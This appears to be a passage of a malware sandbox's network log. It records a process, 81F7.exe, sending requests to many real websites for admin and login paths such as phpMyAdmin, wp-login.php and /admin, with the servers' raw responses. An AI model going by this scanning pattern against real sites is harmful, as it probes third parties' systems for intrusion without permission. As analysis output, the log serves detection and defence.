Feb 21, 2024 00:26:17.550956011 CET	421	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache Location: https://popular.de/admin Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/admin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
447	192.168.2.6	51172	188.40.92.90	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.513715982 CET	162	OUT	GET /admin HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.689997911 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
448	192.168.2.6	51315	64.190.63.136	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.574459076 CET	173	OUT	GET /pma/ HTTP/1.1 Host: www.schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.965707064 CET	1286	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:17 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_in4hyZQ0os5aW960sXco5NOfNPAXQxqbKNB2vtG6zH6v8H8muGOBN5Z7SnzZE0+42DL+jt/wJBI4qbAi3ZqOMw== last-modified: Tue, 20 Feb 2024 23:26:17 GMT x-cache-miss-from: parking-6db66cd898-fbms5 server: NginX content-encoding: gzip Data Raw: 32 42 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 57 fd 6e db 38 12 ff ff 9e 82 f5 62 0f b7 5b cb 96 1d c7 49 e4 38 80 d3 a4 6d da 34 69 b6 29 da a6 08 0a 4a a2 2c d6 12 a9 92 94 3f e2 13 b0 af b1 af 77 4f 72 43 4a b6 25 7f 6d 37 06 62 89 f3 3d f3 9b 19 fa f4 d9 c5 ed 8b fb 2f ef 2f 51 a8 e2 e8 ec 54 ff 47 11 66 c3 7e 8d b0 1a 42 3e 56 d8 c2 be 1b 71 6f 34 22 b3 fe bb 97 93 c9 c5 dd 97 37 6f f9 c3 55 38 f6 6e 06 77 97 e7 e7 77 83 8b 0f 93 c1 e4 c3 e0 cd f9 e0 86 cd a2 4f 93 f6 f8 fa 4b 27 fc c8 4e 26 76 f7 e9 ee ad 1b be 3d 0f c6 df 5f 7e 7c 21 fd 97 91 db bd f7 ef c2 a9 7b f2 c7 e7 4f 9f d3 ab 8e 3a 68 79 cf f9 71 f0 e5 76 dc 94 c7 3f 5a d7 af de 0f f1 c1 c5 65 eb ba a9 5e 7f ec 5c 5f de bc 7b 31 98 5c 0e 06 77 fd fe 37 ca 3a e1 ec e1 ce e6 f2 10 7f 3a e9 da f2 b3 c7 0f 6f 6e 83 9b f7 83 cf 77 d3 1f ee db 9b f3 f6 58 bd ea 3e bd ee 8e 8f 5f 1f c7 e9 ab db f3 9b c3 87 a3 0f ec e9 e1 d2 7e de 69 5f 5c 3f ff ae 9a 93 37 e7 57 9d 1f ee 80 1e 3c fc b8 7d 37 e9 f7 21 74 82 fd b3 d3 98 28 8c bc 10 0b 49 54 bf 96 aa c0 3a ae 9d 9d 2a aa 22 72 26 bd 30 95 32 65 be e2 a2 e1 93 7f 33 57 26 3d 2b ff ba 0f a9 44 13 e2 4a aa 08 82 c7 80 0b 24 71 44 9e 55 b8 ca 1a d0 1f 44 f2 54 78 44 22 cc 7c 74 c5 40 24 c6 8a 72 d6 38 6d e6 06 73 6f 18 8e 49 bf 36 a6 64 92 70 a1 6a c8 e3 4c 11 06 de 4d a8 af c2 be 4f c6 d4 23 96 79 a9 53 46 15 c5 91 25 3d b0 dd 6f 35 ec 7a 8c a7 34 4e e3 d2 49 2a 89 30 af d8 85 13 bb 56 31 e3 13 e9 09 9a 68 37 4a 96 76 46 87 d6 72 a2 89 33 88 0a 05 54 48 65 02 73 09 3c e4 91 1a 39 1c 45 88 07 48 85 c0 bc 8a 59 4b fd ef cf bf 04 41 11 e7 23 ca 86 9a b7 81 5e 0a 1e a3 21 61 44 e0 08 29 9e 50 4f c2 17 8a 39 30 82 92 49 88 95 96 44 13 9e 46 3e 22 d3 84 78 4a 33 04 14 2c 87 44 90 fa 86 87 21 96 88 2a ed 46 03 7d 82 57 9e 10 a3 c2 88 2c 15 62 30 20 09 16 5e 58 f8 f2 0c f2 14 51 36 fa 17 2a fe 04 89 fa 35 0a Data Ascii: 2B7Wn8b[I8m4i)J,?wOrCJ%m7b=//QTGf~B>Vqo4"7oU8nwwOK'N&v=_~\|!{O:hyqv?Ze^\_{1\w7::onwX>_~i_\?7W<}7!t(IT:"r&02e3W&=+DJ$qDUDTxD"\|t@$r8msoI6dpjLMO#ySF%=o5z4NI0V1h7JvFr3THes<9EHYKA#^!aD)PO90IDF>"xJ3,D!F}W,b0 ^XQ65
Feb 21, 2024 00:26:17.965715885 CET	1286	IN	Data Raw: 29 aa 2d 8f d4 2c 81 14 d2 18 0f 49 33 61 c3 15 21 14 24 e8 d7 9a 4d 1a 0f 1b 92 f8 3c c1 42 c7 d8 f0 78 dc 54 24 4e 22 ac 88 6c 46 7c c8 65 53 d3 bf e9 c7 86 51 d1 3c 3b 95 6a 06 60 58 2a 6b fe fe 0c 31 9d b7 88 3e 91 86 27 25 1a 1f 35 ec 86 8d Data Ascii: )-,I3a!$M<BxT$N"lF\|eSQ<;j`Xk1>'%5]4BDk@Tk0fU9EaVubi)2UNhm#S3y2PHKz"%?3d5vF&qY@6c1]WS@
Feb 21, 2024 00:26:17.966000080 CET	1286	IN	Data Raw: 1c 7e 52 cc f6 c7 50 61 fd f9 30 b6 8b 6d f5 f2 ff 00 00 00 ff ff 0d 0a 33 30 45 0d 0a ac 59 4b 6f e2 30 10 fe 2b 11 12 52 ab c5 c8 04 02 21 9c f6 b4 7b d8 f3 6a af 49 ec 94 a8 10 aa 04 16 ba 88 ff be e3 b1 43 fc 0a 85 aa aa 2a 05 07 7f 9e 19 cf Data Ascii: ~RPa0m30EYKo0+R!{jICw%'[h~'EylrtW]v$bPmM_[1lH-hx#V%w`j<zp',]geujpoRZ1evG)~Q
Feb 21, 2024 00:26:17.966089964 CET	1286	IN	Data Raw: 49 a5 c4 07 c2 e4 35 bc 93 49 91 b8 f2 86 e6 35 2f 9c 1e 94 da df c9 76 48 74 37 ae e8 6e 24 f9 2b 02 49 43 e1 d3 c1 77 c6 9b 4e 3d 2d a7 06 c9 ba 1c 2d e7 9f 9b 00 e9 fb 86 7c 7d 38 8f 94 64 05 c0 dd b5 17 a0 d9 32 70 e6 90 d4 66 38 73 cc c8 23 Data Ascii: I5I5/vHt7n$+ICwN=--\|}8d2pf8s#v&1UvXC~,MrZtu+-mg@1\c$b:](9Hf?9:=vldi$=(Q>a'O&]X5geB?1A~fhbm!7TDB
Feb 21, 2024 00:26:17.966376066 CET	1286	IN	Data Raw: 41 d9 12 ca 5c 6b 04 6a aa 8b dc af 8b f8 32 20 d0 32 f0 c4 b0 35 17 19 76 fc 4c bd b9 4a e4 cc 65 c4 27 53 7a bf 4b 1e d8 12 58 6b cb 08 7c 8b 76 04 4c 3e 4e d6 16 de 81 db 70 16 bf 21 92 24 4b 51 bc 7d d2 c6 16 d5 ed ae e4 81 78 3d 2c 09 c8 18 Data Ascii: A\kj2 25vLJe'SzKXk\|vL>Np!$KQ}x=,RS0DDoAl4>cO1Zb~Ecn27:UE\|\:UbE,Oc!-8?Pr%V('{tgpS$e;[!vwzHvckN$"`Z@@
Feb 21, 2024 00:26:17.966459036 CET	392	IN	Data Raw: 91 ca 43 25 20 83 1d 3f cf c3 8a c2 03 45 11 38 d0 ca 44 03 e7 ab 04 e3 62 e3 da 57 e7 5f 4f 51 e9 d5 24 ab 03 59 b4 af a1 d8 b9 1d 71 c5 a3 85 30 e7 f4 33 f6 b0 78 37 ca aa 10 ab 74 11 5c 2a fb 0f 5c aa 99 2d ac d9 dc e0 0c e6 00 e7 af a4 1d 26 Data Ascii: C% ?E8DbW_OQ$Yq03x7t\\-&_tPyZ?-^V@o5Mp`EuYigJ`nqURT+p(FX1Nmi?lBA)LAE.ZctsOPj2aI1
Feb 21, 2024 00:26:17.966825962 CET	1286	IN	Data Raw: 31 38 46 0d 0a ec 9d c1 4e c3 30 0c 86 5f 25 2f 90 13 8f 80 80 ed 00 9a 44 25 ce 55 1a 44 36 d6 a0 ac 74 e2 ed 89 d3 96 cc d9 a1 be 20 4d 76 ae 8e 7d f8 a7 4f 6e 93 fd 75 fe 1d 18 10 84 30 81 c0 0a 1c 90 52 b7 37 57 60 e8 b1 35 6d 6f 1c af 8e 12 Data Ascii: 18FN0_%/D%UD6t Mv}Onu0R7W`5mo?a%)yOPg.vS=0!)PeSKC6T$_@Tbd/muE~wqk?D:rA<'p(`joaM2n{/N&#P=G+y8
Feb 21, 2024 00:26:17.966948986 CET	472	IN	Data Raw: bc c4 d9 1b ab 30 88 43 7c 4a 3e 3e f6 f2 3d 71 42 28 82 1e 18 22 15 d1 3c f5 87 3f 27 22 27 4b 61 13 4c 08 9a 11 8c 91 92 50 76 cf b5 15 06 ff 9e 4a 6e 38 80 82 4b 98 75 ab 00 08 25 31 39 8f c5 5c c4 a4 ea 12 01 80 58 4d 19 87 26 f4 1d e2 48 2a Data Ascii: 0C\|J>>=qB("<?'"'KaLPvJn8Ku%19\XM&H*[4.HdN]@@63bvBdJW9dU%mP;uAgl[h2X^%N/Qj;L%cU/OUo=)vCf#.:e_><M$

Session ID	Source IP	Source Port	Destination IP	Destination Port
449	192.168.2.6	51432	178.33.253.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.606312037 CET	161	OUT	GET /pma/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.777441978 CET	350	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cfca.eu/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
450	192.168.2.6	51574	85.214.145.11	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.688885927 CET	166	OUT	GET /pma/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.874918938 CET	387	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://braekling.de/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
451	192.168.2.6	50624	223.29.45.22	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.700608015 CET	183	OUT	GET /wp-login.php HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.978091002 CET	465	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/wp-login.php Content-Length: 254 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/wp-login.php">here</a>.</p></body></html>
Feb 21, 2024 00:26:20.220851898 CET	234	OUT	GET /wp-admin/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://shinko-kensetsu.eei.jp/wp-login.php
Feb 21, 2024 00:26:20.498792887 CET	459	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/wp-admin/ Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/wp-admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
452	192.168.2.6	51688	45.147.96.4	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.711393118 CET	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.883991957 CET	409	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://glazing-bt.com/phpMyAdmin/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
453	192.168.2.6	52091	20.75.101.58	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.808058023 CET	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.912377119 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
454	192.168.2.6	51979	86.105.245.69	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.837579966 CET	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.005618095 CET	392	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
455	192.168.2.6	51991	213.186.33.5	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.839745998 CET	174	OUT	GET /admin.php HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.003140926 CET	459	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:17 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:CB17_D5BA2105:0050_65D53519_8655544:3720 x-iplb-instance: 52243 set-cookie: SERVERID77446=2001710\|ZdU1H\|ZdU1H; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
456	192.168.2.6	52137	81.169.145.86	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.955682993 CET	223	OUT	GET /wp-admin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://ksv-schwimmen.de/wp-login.php
Feb 21, 2024 00:26:18.136565924 CET	455	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/wp-admin/ Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/wp-admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
457	192.168.2.6	52460	13.248.243.5	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.080394983 CET	177	OUT	GET /admin HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
